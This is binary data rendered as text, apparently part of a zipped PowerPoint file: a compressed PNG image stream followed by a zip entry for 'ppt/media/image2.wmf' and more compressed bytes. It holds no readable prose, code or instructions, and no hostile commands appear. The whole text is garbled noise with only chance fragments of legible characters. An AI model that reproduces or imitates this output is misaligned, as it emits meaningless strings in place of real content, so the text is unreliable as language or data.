...b...H..Ja!...Z.[D..D....    Hq.9..<..\B.T..M..%9*.Br....    ..x.)E^h..+....?.f....b.>B.:.z.;..h..-..'g.S...W......iC..V.(*....1......fXA)..^.|.g....E.g./M.y..q.U.*ef...MuPu.<'U.g..^O.B.....z....$:.0.....T...:o...9...|....M.%....t.T.bY...p.-Y%..U.l:K..B.%Km.*..........U.P..!.-]2.r..>..e..7......x(......S..........p..../....p.3.Vn.V<..f...U.4*.KH...L`Y%.;+..WT..K..6.(..h.....k..e&Sv.L.SZ\'..x...5..j|.rI...<OV.......d..8..^%P..P..)/....Hcq8^..%.Z.W...R...\5...^.t.j..........UNi.p.......O...3.1.q.i..'S.rZN.
M.G..........p]..z..Z..:6^|    ..)."6....".l...`.p..o..?.....~t....3..I*.`y}l<..'.......C).)..V....._.
d..:..dz......d....r.u.\.....{EfY.1J..:.-...3.`...P.......I......A..{..k.qX.....r/Z..n2z..<@.`[.w..)...7.e...,L.P....../..U.\qr........;3..Jk..y.'1f3%A....a1.z...b.Xv..+...m.B...(.*..}...K2tY....=,..O...[J..H...@9.......s}..U:..
8..".....h.;.2.c6(9nDN..F.....p..l.."W....RL.`........zjjx.q...,.C..(8.ScS.
....]...K&xl..K..<.tv3....<...bX...-....)..\.du..9.1V.,J.D[>.R.D`z#P..bz.|b.g....ND.;..b...c].`.0..O.<...;.....j...R3..v...,.&...F\.... .%X.>    HC>....<....7.....A6=8..,.d<....76.w.[...JmI...b):E..x ..........Ik....e.=...e..$.....m...........kt...r...C9.+..d...?..D.S..[.......:..pf.}.....{..../....Q..
...f..\......Jp..c..Du.%...m..mX. ...p...f..bh.,....}.[.\...e._..sk7....hlK ......v...<..w.....%..... ..|..8Ce...."N.J.....'..#.}.M(.......Z......
W&..XZ.k4..?B...............j._.q#&.@..`&'cZ.@...b0{..E.q..A...'....p.R)...O).Y.A.......ra.nmkE..h.....NdY....>#..XM.h8...;./LOPbI.h<..yw./.3...v<....Y.........~z.3.........#...ycG    ..`....
.....S
......yls...K.X..H)Jg.J.d..1...........<..H.....7.o]Z...*.#...0Q....p2..8zl.+...1..R.*Q.%7+3.....C....>...J.rz^..eq%....$.U
O...O..1..>.... .M.7.C...8........z..#....-k..(.......1...7..F.?........ue~B}b....i....F..+.R" ...L...39]O.3.2.....&...+FZ. ....-\}.F..Tk..7j.(bY0................e..XI...@..6mz....l@Ks..S..,.O....^.dYf4..b.0......)_.....2Y..8....~ ..(.db...F......n2.o......z.9...pl.O.kS1#X....u...g.....6......    ~.......@...0...e....C.^.|9..]Vi1......ec
,t_..i...x..W..|,..aGl../.l.y.
-..&~....Z..ze,4b...2.....@..JH.Q.i:.
.Y.x*....sf|......fQm.0.A.......li$.}.BUJ..Ig8...f.;]f.e:B7c.L....L...'....}Zc-.&. ccw.G......'F|.G..~uS0...A...i..;tB.....`c&...,9    ....x-.l....a.@.G...........~..;..u...i....Pv_?2..11S.b...l6..r.eoZ}...0?..(6e2N..c..hlW .R(ivMX......SW..8....=.V.6K...Yc.....: .t.(..\    T.3.    %....J.W).d....]r..i.sV.U.....g..}.hA.J.*..T9.....7..~../.....]#..Lk........o..=V....(......64.IWp..0.9....yA.A.L.V........r.i..'.w....kccc.h<..... .K.!.E....z..+....v...[788....|oo/-.C12..y.b^.D.b. c8...y.k/5F.......-kM.....[.f_k7..Wd.....S...Tw(..h(..AX......\..(.iY...oU.+U..hy.6........K+%..LF/.k+$9W...9.h3?.D...U.]_.-.P...;.....{.......T..f...G{Q..y5_|.5R....Z$.B.((.    ...3...nc.Qf62......\.WS......}'O....h......4.7..I...@.i......F./Z.p....v.r.l..........=..b,X6.......@.\...!.....,...q.[..<g.O.f.(|.....?.z<..>2.....L.Aa.]x....L.....<..<.*V.-...V ..2K..R...]r..6kW.D....D{..~x.go.4..j$..v.C_.........L./.D.s.'.DP.QP....P...GG..Q-...B..b...V. ....L..H.....o.T..X,..M.88..8.C.......#........C2........K...9..
..r...
.[".."[.UfM.U..v.E.9\.i.`0m.bC2.c..Y..e..6.c2.3.u.R...c..>...:..u.J...b$.......x..b|..La.%.S!.*q.W..+.*m.....<1..(s7..=    ._z.....Z...4M/..;...).6.m..ug\.....z.....W..._''m+..............6..1...!.........g.";..+2
.M....c1,}.]..akhl|.;.q.[..p...+...D*Z#..C.|.6..F..`."..L...^A.U.....-..Q.KaP-YZf.r4...@......6]..{.Q+.#....
..?(.:'..m.H8...91z.........nu.:..G{....x_.P.D...k.35...Ms;6^q....k].F....TH..!.
l.R...C...[.t.........V.n|.......L.i:Y.:..K.......d...-NG...........V.R.Y(.Q.."..h..,.6..E....D.E.K....R..2.."......*
/.d...~..=Cj.%..UF-..K].wez......g.0..^u.r.....q8..k.0T........hJ.e.........X.n..oy....<P+..:....F'AJ.X..B..%......b.l....
s."...^z1rj..b....(.....:l.W.z..n<..K].......J......;b!)..x8.}v4.i...S..TP..
.+....M    u(*.....(......g.E.+YVGH..lN....
....?.........m..".V..V.(].L.Bl...........f
.1_....0L......".&....45.r.y.^..%.VA.l....6..f.,.\..i.T..`.`."..f3......D.i.)....O..    .....5..].ek..b/y.u.~Bf....L. V........b..=.C.Ec.E.di.$Z.m..v.....O..r.GT*...q4."..e.....*.....z.%3...X..H.S..(y.q.C=CC.p...ga...B.%.65d......7...e...\p.5..=.....
..6.,`\S"n.Q.]..i'bN.iz..g..l8.."X..B .f..AKs.../..=.\t.5...p.h........h,..b(..:..Y..?1..1Z...K...h.H.q....f..P%(7..I....xgV..C.k>..:.i.U....]&..[.....U...gZTAi.P...X.&N...U.......6-..%.,3.}......`~.g......./..W..N^R......tk4z.k.....k.......]....B.G..4Yo5.1.a4a(..)........0....1C<fJ$.I..d.U7...NG...c,u.r......b..w~Cs.5.S,.{....^.C.l.l..v."Ox.....X    .J.YpXNF..%.s......f@.
........~..2...x.}...%q.....@...c...
.......,.K... @.{.75...qzOV    .H....U.>....>.....<"......,...Y.C.S|..j..ph..{..`O.....;....Y...Gf..y.e;s.J.w...l..<.:x6...]..S_oW..N....w...q.}.p....\......!.q.A.u.}J!..8I...>..J....f.......&.."......!UM.I:..F.E.m..~(.V..Z.@"....V.).hYw.M........n+.I. ."T#Eld4..0`.f...(.7=.6.....h(......    .B.`......@.V....=........Z.v2PO`&......f;cX.,K....&ZF..X.u..O&..#.S.w.`z}L....    $...2..o..w.j.'......J.q.7b&e.-.].#1....G.pF.....7.2..Ev....f..U.Rt...............W.;..3....+.........7...K..........;....oX.:^}s... .gBU.@..a.P..Xl$.....r.'r9..E...;1(...S.e.G.L.4.-....@z~...?..S.z.'....`mmS~Q9..3..).4x....:w..6.+.p>:0....7..pm*.R.d....\..[......\.k....W........%.......4.K.vX.b.......h.U}..~....hB.8TN.4.......,%[.<7`.|c.TS..4..~K......).....k....W.....&L..7.-M....b...xI[k.........>.
:..5..n.......M|-.>V......q..-.Tt.(.._..V..s..a....{1.....x$.?......6..1%f...^.m)}.D{.....3o....I.rQ....D;.0.....X_?>.72./...+....3\8fN 0Th.-?.D...^.@"..U$Z..@e.p.1..m_...J.....r...z*.(.?.....z.j1.....O..J,...#U..t.3....X...........&.y...f.hi:........A.[.hl,.>2.'ve2.T..<.....y..VnS...".....l....a.......c...0..*..+.X.d2....M....)8.....|.k*..x 'v.._..X6.6..&.........g}..".Q...DU..N..M..$+!....B@......._ya.._...z..(}.&.,.i7[.6.......A...`.DG......1.'.>I.-.q$.i..\.w.,......O...R......1.....S..|......K.......z..k.rI..z..,I"P....a=...O.}...a..H.W.......$-.+..2.....E...... FvM....Z8......@O.E."w_N.)..gJ...."A..b[~@D...M9    .Z%.b...E.B.-~8.G..L^...A.&......[H....... X......._}v...w........{..c.`...i......    R..E.d.Z\...s iyl4....H.+..p.3...O.+...r.4......L0.....:..t.#...'.....#f{.Scu{P....>.P..{.P...+.....*........PP......3.3..n.w....OP..'.....s~g.<u..
...
QV......g.:..KHg(.#.3..G.x.k.~.7....J..eo.t..>v.V...@...@....u..#.h...+.")r....l.......Tk6Y.6....?r*D..%*^ ..`|9Y.~.&c..`4.....d.A..6..
....;%..@......\.U..E.*...:.....2}.T.s.-.U...O..\U.C.y..... ,..    yJ.$.r...D[....`:F...HN.Z.....>..VT..?.cq..[.j4b.....f.    ...d7.@.l4..*.. .g..I$.IC ..'.|7.7.H..,...b..N.......hU.(.f.S.]-M..>......f.....L.3.q...U............k.YkBst..#[w........v..0.......1.9._3[..O...7W.g.\....\......ZnU..e.VV.0U    .,v-.T.._gT.6}%. ...y.K.Wf...<.@Z%/.Z...._.X.6.........gm....Y..jh.;.d'k......Y....V.I)H..U..\....@i&.    j).....dY....nA..=s...........q.(..u.`.........'.H.f...Ht.&..r.B@7..uF3U.\.5>.D..l*..dj.*Y....#...G.....d..(Y..b......[O=D.J.... %H.f$.c...2.}Z#.........:..y.W.:k...JV...UZ.D..b...T..<8...e...u.    $.....`(......E@......P.Y.Ujo. o.....i+.VW....\.H..}.d.%.:"......O.z..aJ9..@..w...3.d@.u^...L.Q..UUrm..g..L.....~.L.Q..u*m.}7.........z..j+..
N..wz..o=)J"Pe.v.....T....9..,o.*.I.W......D[R......(Sr....{..N.e.*...d.@...{....?.......[P_...J.iP.z."&"...XB*...H.$..@.....5.A2f....n.....l......R.-......hK.72.D.x....}...;.GEV......0.A..J[<...!....%.J.-...<..R.x...K[w......w.-.F2_..H.q.`)..qI.....l....LG....?..l2#.m.! 5.iw..\..3...%.B3...P....m..'.....#m...^K...wij.Q....?.v....$# M..|.d.....D@"0...D;...l.D@" ...L2..h'....%.....D`f#...m..z.....<..r.Z,3.c.;.........7.2.@}.WN...v@.....=.S....}"..2....PJ..H.&....V.A^......yb.+C............Z...\.....
.    .(.%+Y....)H...U.^I..;.L ...L/........J..t..QJ..{.J.....;.R.D@" .....@....O..W.....
U..,....+Tm)V" ...LY.t Ze.t_...a....V.VU.. .6..]_i.$...=s....K.....D`. P..4..G~O*.V.$mV.W.2y.....Q    .!.....3...5W.X..
V.... Z..5u.Y...D.
....."...t2..*.m..
,HT.^O%.R......S.FY...D@".D@...b...Fuc.{.O..M.2Y..)....x...Y1..D.:..`:V..Qo...Ky..&}.....R@3.P/.."M]DG..>..C...X.......=.y.e)...@....h....1.2K..+.@A.-.hI.E.%.K.$.S..I.S..M..N).......x...2..........j.$..>Q..S.h..#..G.....@G.MWyR..C@.g...hYc..D@" ...T..I..BZ.#...H.$....I.....FK.$....@...c..Bz..#.hg....-{...yj.%..W+....1.i..t..$Z....b.2.^...Y.....N.;...#._.;v...7..x..Z..?.yq.../l)....^5,..3 ..SE..F).T.1.*.v...2. M.e.(..^.@...]'X......:.../...o...#=.A...,[.tU..nV)..g.V.Y..G."....T0......b.FYRV[..M....*%W(..!..h..K....Uf..\.{...]..?.0.....zV...h..l.'.....x......m...f.j.d....z......~..w.."..M...,....'.k..y.\UU...>..Pf%G|.?.<....!.}W._rZ..1..8..a..T.,X..f...EK..:7}*..?..\.E....Ue).....J.T.,.U....?.d`...
..D..cK.7.v...-Q..-?..
..L....L.._..".>^...<.I.....;....$...?....z6/...t.}E.7^...+......RE../$....\.+g..
.UY.%......u:...eY-U....P.$f..Z:.$.S".A;.p.,....Hs...C../.....\.4.m.....>.j......+.....`]......
Q.....>JC,{...P).e3.x.a.\c.d...su$...C..{.L0....h...V.3.;..b..R.KFW"K..3b;ce..Wu.. .]......T.....X..a...#. r....s..?o..._?...P.}..#3>......E..'ZReh.}.4.M.t{..A....I...~r+Y......Bq...).f.QU....L\[PN..2)6................w.....O.J(X...@pm~..W.....t..=.......D[l&7.X....:......m..*......bP...s....1..3b{a.(.w..g^.4.....aTx!.5..g[..\7.2..X."..... ...L.N.S.oT.2..:
Wz?).zu,B..I.L'..]....$..g...5..|..IgY4.......9 K...-g.........K..Rb.v...8..*$..c...X/6......{....,+....d:.]h.....H....ws...QW..(.....D....M.O.
A=..Y.48....FX..c.....>..|...b..2..J.o.S.....^l.]5.....`Y..GF....T...q..-.R..4..BwM..D SE.]i...$.*2.G..Eq.8..r\..<..n.qz....2k......E2*.k.;...j....1...R..=.A.d26SQpM.....X.d.#..L..R.Z.O...^#..+V....S9.ci H.-7.++..he..D+.@..Le......6O..2v...3.h..M.r.$.V...X.T&....l.tC@..t.c..W:C....(...H.$....@...DM"P.../Xr....%K..H.$..G.0..
/L..^.:..f9..egy......0.4....o..u....D@" .....4...F.$...H.$......&.v..Y6G" ...H.$.UC@.m....I.$.....lD@..l........D@"P5.$.VjY.D@" ....F.$......,...H.$.UC@.m....I.$.....lD@N.Q.u.qs2.1W_.z5..L!y$...'.,...H.f..R..p..2.....(.^.X.*Vf5dv..D@" ....$Z.X.....|..]..:....(.....W..iO...Z.ii&..E......2*%...T..Vt.u(..2..B@....-....]    O.2....*B..W..J(QS.gt"2T.]u...2M.0...?.'h...f.L...*.u4.i.......(.H..B@..8\.......x..zA.B\..v.w..\Q..n.L,n....40un.
.Y....#.&...I.E.....y.......[&....].(.2.....@..4$f.4..CVS........L.F.{..s0..._mU.1.].Y.b.F_.y`......V..L.Tw3kq..PBq.....A@.m
...$..[.>...S..g.|a$.j-.oe-.........yU...^....F.....J......j...I......E.A..P....f...h...$..(..y.l..(..............Q....L.%.....F.o.`..d.....)XgQ.2..\Z..L#....hY7..lWn..$g}..yC..]e.f..B......C..6.........u.KrQ...g'..h........T<.._aJQ...%...aUI..FV....".S....-.j.yN...4.k.&..c..C..d.$.2.....Y.o
.1Je..c..)...(Y.7{vf..L.1N..(....;:....;.E....o..B49.8...%.]5+j....!...B....H..Q...O*.,">....yQdE....%xy0.!.B.F.....Qd5.5F.P.39.PS..........z.O.:.W=..S_O.."..3.>1G..G.<.wm.'..B...B[.
...p...U6..`g.^..)M*....t<.....%lm.k.Bm..B9tR....K...A.g...C...    g..7..1oy.ru.)...e......@h.3.D.Z.}..O...%1.,..B...".J.........    .{4:....n`.I.......#..P..gd.@.......v..L..... 0.....c...".>.aW#3.. ..#.-...    .w.ZK..U.+gJz..@...kha...@....$..V..|....6t?..U...Y.f../...@..;"....@3.......a....c.h...TN8.......]...y)......a...%J.......a..-W.......6.:...R...F#....... P..F.:....c....."...j:I.?.Ba.?.. .....f..L...L=....I....?...7..!.....m-l!...@.....:...9. ...@....m-l.F`..\.k..].....     ..O..C......    .u...%;.@......B;..0<. ......[..._.; p..I......p.......`d..}.(................&.....&.......T....j.a...S...8,.Qc.9..#....W6...I.x..T.ai>I`.
...@hW?.$...vMEo\..c....u.M.B.j....c.yJ......N...J.."..6..)...3%0^..g....l..+..ig]....y.|.:.=G.p...sC..of.;.y.t.....B.......L.@.5 .)....X...:oD2...}..9?n.lg.......^hV.*f.X...].......A..&...^8`.....V...w6.....^{....h..II...S).8X{. z...=.Nh...gQ../{\MH "...&...!..x.....%..B...(T./....z.K.PB....WC
.SLG....[.3. .............wv.4.\...Su....K............*..@f....T.Z...xw..)..1..K<[x......Q...."......    O....a....B.?.fI.......a.=.......&$..N..C.|./3!^v.......(...........*...?~@.w...o..../y...=Z.^v.]....y.s..X......<.......'.^...x.:(B;.... ..N..7C}...~......._...w~..g....~......?..%..# ....a...&#.@`.....'.~P.U
./|.ER.........~....;......Y.u...y....YJg.....o:#....xi...+...........fr...\\........E......@....@A_....y.#........=..K..._{.I7..?...(..Y."
..._i.,.....K.-R-..5,.O]...S_...k?.;5..[b....*3|..l..n!....?(. .....@..J9+..{.#5>..._y...C..x......~._.9..j.[...z../.......+m...!..|5K....x......)..]..WO.Q.K.a.*{~v..G.9.d.
.=+.....~2...q..z^$t............%e...r..."....U.*..........`..._..cr._..^.<..-..%.. (    ..N...agl..x*....=u.P,....<*:.C...."..._.c.z...M../..W.....?.............Y....|.)g......Pm....H..Fa..@`.....e..+..'..s....[...m..Ji.........F-V..f+.*.....Mr...v.=....|..-.vI@.t..Me].#.....Me$]
.5o.%..S..D........{.....+.@..@......'^x.(.[>.S.@.....c.pT.LE......^.6W...NW^w...t.....(.......Jg^+ PX+..T.P.......#    .....G.[cF.]..C....@..".....|...$/)(?.....+.....).P2g..<.BuZ.2..v.N.....{.a.eN.i    .%..E.&XX..4:.TO..$..(4K..........^c......x2.L"&.......U.%..O.r.=.$....f.z........@^$.A..- .x2.....r..k.. .&....fs............._...P.:.0.I.1U|#.... .....Z..u.....y-.. B..XR...N..Z..a(.nKg.Z..VU....~..?..L.[h..=.m.@...-Y.....=............[..$Z%.R *.....m..u 6.7.3B.s&...yv..a.=.......&$...    .ah.@....... .+.P.9D ...[....[.}r...B;    v.... ....(}`.Vx.'. ...@`P....8q...@...8L....... ....H......!...@...-... ...@`D....pq..@...@h.. ...@..#.@hG..k.@.....B.5.r.G...{7$,.
{.[.:..,.b..RN........*.n.@....W...K7K..gH@.W...[:....f....Nh.?...A.
..(.F7.A...&CC.....>......bT...i.....I5jP....v.u.p>...b.O<D........_..0...v..*...-..{yc8.:\[...."..............2..E.....-...,.&o.......a..M...%h(.8V....L1.. ..
mC........V.yL...E|H2...JB..5....o<M...5.....h.3....S.M.l...d...8O....xA.&.=.&......D.Z...~.]..F.,)R5J..XM+.n..e.........\.\.}. ...C!..^...25..VP...!.9c..T..Rs...g........]..%|a..Y....;../.k....R.....7.:...U.B0t.2..h^....\.....S.c..o.S.c..95#..X.$...".(.UcT.....y...w.*GJ.......g.$...&7k.....g.n.Xlac....t.4.e\.9../..6~.A J.Qh.....x..S...%....a....".j.....e...wF ..5V..I.....|D......z4..<.r..M.m.@....T.X....e..K.....N.P.."F.L.../.q.ezt..m.L...KrtmF.c..Q...B...C]`..@......#w.=....s.1pO..{C...7<.........)......l.......a...9. .....~2T."14.vo.....d...If....Q..#..+..>.R.6..i...6.*.C..N=G...d-.<v...... p...C.J.+..G.NT.xXW..\.U.[.9..-x....K...Y......=.S.@h..........F.ZJ.M]z...n....J....%A`...@...X+...y.Z'..R..{*....0..L.. .Y...f.......R..QF....
..@ J.Qh.    ..b.8..&. ...@`&.Z.Voj.wa.)..8(..Y.z.....Y...v......e......1V.........@......!0..[#z..K.p...).K...9......x.......@..f*.. ....b".'<.T..^%...|.FS.........*.\.
..@`....6.....S]2..[y.U......5.....vt...&D.....    T.m.]..m.M...B.....=    4..`#...w1k{..........!.......\........`.z.....o    .F.....#A.@.../..z.w|D.....}..jj....M...r...[.|F.g....e..^h;..h...<.v@..9w.E...)K.f....2.q.Z..1........LH`x.M-.S....T..^1...@..U....U.0^...e..3d.y.....S.@h."...... .    ..B;....`.W+IB...X .j.]`.....@.......7CM.
.C p...(.T..gN..,n..i.q.,.........k&....hcU....<...u...
    ...0.
...O.......z.S....Y4`.9..z................m....m..V..j.j.V..>O....H...E......K'.;.nA...[.a...g...jV.b.J.p...Ejf.}.1...}.y~P...7.]{..<>!.............;.. j......rag.q..CJ.Vn...B8.!y.../;..\?r.....^.7..u.....6\.....].T'%. ...?......J.....IEND.B`.PK..........!.,.e.....P.......ppt/media/image2.wmf.....E../!!...H.    !...R.D...b@.
.J..4.
("JQ#F.J@b.E...
XPQ.^C.-@. $.R.!..{..........yo.....wfwoongwvw....{I...zm.k..n.....e.r.}h........k....._%.<...>:.W..+{.0n..gP...x.....2R?O..pQ..`    I.sO ....d..>..lh..).e    e...d..!..(q..~.....>.PV..
qY........!bH......-.....).........o........._...............................................................
,Y8/.
<.d.@wn.6..........................................................z
.T.+p....)....}....@g..K/.....+M........Y.j..-Z.M.:5{...j........k...58z...>.......f/..b...3f.y......y......,p..Q..B......z.W.......t.p.p....[m.Uv.........+...~..5.......g5...z...........{X~y..eY.......?>.8p`...~4.[[...........=..........N;..O...M.Y..........>O{...k.UG..y.....y.y..@k...~.....N.~....\..w\6v...........;,.?~|.7n....{....92i..<.|....#..w..Y9.._.*;..#.:..._..>.....'O.q..a.m...........y..rd......V..js..kL.0!C.\ ...g......C..V[.F..{..9.M7.T..|i......|d.....8...................;.....+.a.|.m.m.<.<.....#..|..ZH,GT.J{..-.+....d......?..s...{..$%sT/...8.8.8..=..r.-......#Fd.q...Y.7b..8..................T.9.g......_..=e..].am....:(.3fLQ.X..VC^......a........@......*.c<...5}.9.......&....g?..2$.o..!.g.y&/.y".dM....p._.....>..........o...;6.6.l...d..r.3.....w......$G..R.......GB;...m.<.<..< 9...[f...w....H.^.....>...+.x;.y..G.4p......zZ..z).r.
v...Q.2.s....././.K^_t`..\...c..........$Gv.u..+_.J..?.!....of.........v..z6.v...%..'X.@d../..r.....f.+<..........H.....W.AY.\rI._u}..^.3...x.a.~........$sXK..O~..#..k...+...m..v.A(9...M........G?.Q...(..G.Q..s+....M;.8.8....`W..G...k..?.....v....g..Y.+....p...l...Wx.W.&....f\...\.l..7}.......8'y.e...... .1....x.....y.y.+.............z.F..=1.z.Fi...................7..aY.r...........Z...G...J{.......C.m......................./.......h..;..?.....................................................
.......O....Sw...kz...........=..^.~..
..... ..v~.........@.....3.i._.m.E...r$...o...y.y.y.y.y.y.y.y.y.y.y.y..x....z....g>S...t.>....Y|6.........k.'y....C.=4O..O..w.qMp.....x....._.........B.......w..$..y.9..&t......S>..vZ.z..3gNM.W\qE.....=..    ....^.}...(p...2.E9n...?.....q...?..C...|...kp.....8.g...Wye.<..`l[...n.q..].GY...........R.k..xb6-.....<.....W...........K.............A~....)g..........`...{.1eJ}.\.....-.{.......4.L......SN9.&?.}..w6.7...o.2......zj.|.[.. ......_...?&l...<...k...o[._y.S\u...._..5...e...G.Y.M    ....o.....|.?0e{]..I..W..o8~..W^..v=...&......=....k..._ad.]w..m...9..?...?.c...E.s.....I..w..]v....ecsXu.0`@F_...9.....k.t......^......a..4....{.5C......_....W.x.Wx.G..~....x@....;g...J.g.........a.._..{...^X.?..S..M.#....&C~...K/.ig.5..........e........]*..|=........n\...=7..../......4..o.u......C..oN.c..?+.t.!.....5t........gO>9.;..&m.....y.C.K.......V..2^..._.v.kJ{...../..I..t.M.-n.. ..&.lR.'<.....;.....3;.<..3.....M..<...?|.O.|l.....[.2...w^.?|../.....9M<.I}..W...{..Eu.d.G.=.w..8....o.8 ~....w.q...5.\S....w..t.....1h.........AU9..'.....f.....X.2.!.+G....<..Hu.:..
...|Q......D..
.0...>.......C.KB<.a.I...&....d,....=...I.U..!....q].....O.o.r.Y..6.....~........#..g},.N..J....e...a,K...w;).;..<../.#....O.y....g...)_.z.....u...{|.....{T..'..    O.{......6..    ....3...t.C...1^J.0N.....Zk..._.B..Z9".I..lY.LZs.5k.HG.(.....I..^m^_.....5.6]..#....l...i....}.c5.)o...y..V.=    ...Ag...;a........:.x.99B./.....?..}.[.*....Ao....qg..|...z.BG....=..d...Y[...n.-.........r.....o<..w..GRrd^.k2..;]..4.'.j...KSrdV...n.....9AG.\Ge.`.r.?A....wUo^......[...'..m/9B.......x..Ey...C...>:l.W.....|.w....G.,...KG.....    '...aGG.2...w.98.B.N.G.spS...,_.rD...0...<....P..y....W.U...Wg.....s..z....!G...W...@..|.....A.n.Po>r.}...<.-..0.%....b>B9...o...x.w....*.....|.r4.f..z.~.......F}...X.....-j....#.......Eg...|...?......?..(.q.sa..jx........._"..z#.OE.X.UN.m..?r..]v)...Y.k.'G..t.4=u\:.V..6*G..q........=~..O.5..#.m.]OZ....Dg3"...o}..s.9.k...o#./R...(=.].C../&.].e.y._....N...Qt.)9r}.=..|......g.;.w..."s7.....|......,._....    .^...O....8b..!y|k..y..d..<k.*Spp._.M.,G..[.G}... zl.........$5._..W..~.._.V_}....?..O.kG.O........'.........r.\..V[.tMU..U...W\q.......)9..Kam.]....SrD:.2.rX.Q9..).W....CWO..7...Y..H.....f..\R/.....VE.....@...dNs..."...'z k...W.o....9y........O....k...K.`}.V.......~2g.UW...X...tM)....b.-..9...cB.d.Y..4.gM.Q....q...k...2'....mnx.....PdA=.3q..khD.L..J....W.b....y.uE..Z
q..pJ...]O.0..?...~.=..c......    .)G....3.a..^...;...Ks.....{t%.zr.y...7.v.7.R9...u.b....9`\VO.........s..K.#..T....sp......_..B..\....&L(.B.5f...G.Ce.d.....;..]s!O.e.Rrd........u...`..</;oV.b..K/h..k....i/...<P.    ..#...'Re...s-.G...^....-s......f!..c.=6....Y..h..0.Ao..2.|..=3rd6#.w..E.o..0O...0nDV<.x.<....X..'GXSy...C.(.s6....9B.o.=.yM..\e<.|T.u.uQ<pz....#....`...(........G.;Y...3.<3C.K..z9.g    .s.G.#b.4...~..5z[....t.|...g..........~......^.o.....W[<...'G..........4..:8tl..2.A.F.=.C..D.<.}Y.V\O.....~Bm..Q.5jT.o......PB..../.|...2.A
..k..!Od...S.."GN:........K....>S...K...g.uVQ..#..7M.....H..~T..d.F..A.....+..B...
.+......*{B....}....
c....T....#........>.W.#.........[#G.g.B...F..y.>A.\....{)...#...4....!.#..H..........9H.9.:.......`[...Ek.......6h}o..>.{._0.f...D...&M.._..V<:Q....ua...k...\...[y..    k....z....#.US&.e*...7..3w..!+-.{..Oh.....s1.....{v.{....l....<..7.G...N...+.3......%. gx.g...3.a.@<8._..P.......,..]3.......k.q........c.....5;.....r...a.,<.#.o.....]K..Ea.7....oi....d..p..=e.y_8.0.......u..d..    mG<v........&....E._....m..v.k......G8S...<.+...=.\m.. ...h>...}z..>.q1.P<.H.,...c..p..m.Y...H...........9l^..Rf.o.~........|0.......7....:.].....C..PA.=...U;...B.../{8.C.=....    |.x..*.B.9.....t....c.[.&.n.>S4.. {6.....|.s*.c..2......[......K.^@.U .IK.}.....|.q~c..-.. [..N...=#.<.|._#GT^<?P..    ..~..    .'N.....|..C.h..u... :..'...JKA...    .\..YQ.&oi^    ......6....Y..a.3-..k.J....ZZ........ r...?wj..E'.9~K?=...R..e....6{.b\...6......g...:P.Fro.....v6..,9r.t..J{..Z.W..B.rFQuBf(...x... ..=g..f.b=..y.....n.J...=.q.4..6.p.....p.....W.....8.R.. SE....h...c:.=.dN#.`lG({....4.....zx...ZKQ]..........`J.T}N..#?...Hs.ek)..TI/[K.B.8..Q........vm.].z{!...2.coc..u9.......,....iJ3..,..].t_..;.......-...c.p...U...r.}#.eY...-z.|D....s%.C..`K..r.....&U..g...4^..8~..>.......|......Z.......hC.#..j.,.H..}.=+..".X_l........rW.O{..[Z..9...q..{...{.Ui.o../Z.....xp~.9Z.&........w_~.w...y...@...7......}...K.......................................m....yN.'v.....x....    ...m;.h.w.y..q..^<...    ..hG]....m.K.:..).v,b..mY....o..^.q.W.y..<.m.m..<..w................m.p9.l.....a#.....ci.l.).....i.M7....c..........^<..N.....OZ.{.;.......g..+....^).......g.....6K...}...o.s.Ve.'+UG.....<8.k.to.%.......z.{..O........>rx..p.....Fy.c[...W9...<h;...
\....@._....e.....x.,Mq........Y.=ZkW.5..om.Z..=r.5...2......b.'..|..\.._... .........qA:6BEC@\..B..../.+..;.(.W=bh.4...j..'....y..E..0._X..~/......?1.b.S...M..F.._....+mC......*vo.;e?..#...=....o...........y.....>.@..1vt    1oc.W._Z|........{..m.Q._.......J....e..b..#......W.3f.h.ul.Vya..v..E.b{.'.xbM..... >.......v.X>Y..^.V..i/.b...O.......O..L6...{....J..R.............i.O..
...Z.@..?#._&..|m.>......*.}...p.O^y../..>.H...p...X.o.....UH.......S\.g.>..B..P~...~....../w.....#.......*G...mGl..r....>...t....6......}4~W..<3x..............;.~...-.-...a....*Z .2.v......v.-..?....2..W.v.........{..\._.>.....h.u....%..x.-...........e.....e/
~B...]I......6..G.]*G.-..mW.....:v.....pw.q..]..K#r..uv...#.,6.U...(.;...V..N<.1.k!.>...#.y.~c.O.%G.i....w6'G......O.q.....W.+pf....j..r.Lq.`...$......@.WU.._........cx..h...H....!...1.9....W].3....9._....}+>..V..]...A...".3.2.-._(...A...y.!..r..Q.....k."..'.....gaN.....E.....!......}HJ.06.._z..+......P.|...=N.....?..z9.u..N....G1.N:.......,_........~.P...C..m..&M................FV..6"sb.mJ.....'.......~.m...]...$sb]..b(....o.......*+..R.......O....?.}....&.....a.B...,%G./.U....~....8e:.X..W..#.5......./..K.P.2.P*.....rDyZ..#..6....YZ..    .v.]..._q)xO............`...-..y.."..Se.......:.29.N.:.....7....i.m...%.Z9.8..-c".c...O......:U......].{.CU..3FG.C~..<.{|3.o}42...#..........a...2...^....)..I.w.i.e......29..Qh..d;..!...cu.c.....h.....#.7x.....f.e...W...."SR...z..>O.B?.^{..y........z#..._......T....D.........Ct.|.<.:`...........v>BZk..k.......:....){.........w...[......1....1.....y.............M.#U........i-.>..?..P=.O..........x.]...+..{N..u....$..Cr.uz............c.K..|......V...%...Z9.<............dL.....qerd..w.i...>..!)?.n....[..[z6.v.....!8.}V..#.......#.....+........(.z.....Lz....e.\>.'.2_    c$p..1"{4.o..-K..&..U.....1~........x...@.AWu>.2X...v...<.)....(.../..i
..../.."K.....././.F....sL^..q1.....Ob}..Sv...|.nv...T..J../.=<..UO.n...z...'.U.........M._.^&G.....|..d9......]w..9B....-..@.."G.2.C..]...`.^q.....#....:4o.. G...E!...QrDe.........q...!..............Z#G4..'.P.=....../c.cv>Ri..ao..hN..O..}.2.].....V..{J....x..*.{.......sR.j....=......]..Q...o...V....<.)..R.......l.....eP..5.2...
4v....Z...g"...a..:.W...xV...... s.E@....{6.J....w.......0^....X....EeZ.....9<....k)...%s....9.....w.m.........I.5...c...#......*s.....1.S=..8h.....{.D..o...3]g.uV.~_...4.1.u.;..........g.N.......p..w...wc....x...v.z'.#.W....y..B..xd)qv.D...!...Q.r<d......f..^..b.Jk...`.
...!H...9{C.+.tA....~Y........Q...gP=.yV.g......P....]m%G.....a.....x...z'..
